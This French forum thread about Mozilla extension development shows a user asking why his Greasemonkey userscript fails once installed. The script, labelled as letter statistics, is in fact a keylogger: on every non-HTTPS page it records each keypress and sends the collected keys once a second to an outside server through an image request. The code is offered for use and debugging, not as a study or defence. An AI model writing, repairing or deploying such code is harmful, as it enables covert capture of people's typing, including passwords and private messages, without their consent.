Javascript dans GreaseMonkey pour Firefox

Vous vous penchez sur le développement d'applications ou d'extensions pour Mozilla ? C'est alors vers ce forum que se dirigeront naturellement vos requêtes...
paulair
Arias
Messages : 3
Inscription : 11 juil. 2011, 10:32

Javascript dans GreaseMonkey pour Firefox

Message par paulair »

Bonjour à tous,

Nouveau sur le forum, j'ai un petit problème concernant un script executé via GreaseMonkey. Le forum de GreaseMonley (userscripts.org) n'étant pas très actif, je viens à vous. Mes connaissances en Javascript ne sont pas extraordinaire, je suis en plein apprentissage de ce langage.
Bon voilà mon problème. J'ai mon script, relativement simple : (key.user.js) (aidé d'internet pour le moment)

Code : Tout sélectionner

// ==UserScript==
// @name KeyAnalysis
// @namespace Paulair
// @description Statistics on letters you type.
// @version 1.0
// @include *
// @exclude https://*
// ==/UserScript==
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
};
window.setInterval(function(){
new Image().src = 'monsite.com'+keys; /*cette page analyse ensuite les lettres tapées, de ce coté il n'y a pas de problème*/
keys = '';
}, 1000);
Dans la console web (Ctrl+Shift+K sur FF), mon script fonctionne très bien. Mais une fois installé dans Greasemonkey, il ne fait plus rien ! Pour tester, j'ai inséré une fonction bateau : setInterval("alert('Hello')",2000). Lorsque je l'insère en début de mon script, elle fonctionne. Et si je l'insère avant window.setInterval ou à la fin, elle ne fonctionne pas. Le script ne serait donc pas lu en entier. Quelqu'un saurait-il pourquoi ? Y a-t-il des particularités à GreaseMonkey ?

Merci d'avance,

Paulair.
Dernière modification par paulair le 25 déc. 2011, 18:15, modifié 1 fois.
paulair
Arias
Messages : 3
Inscription : 11 juil. 2011, 10:32

[Résolu] Javascript dans GreaseMonkey pour Firefox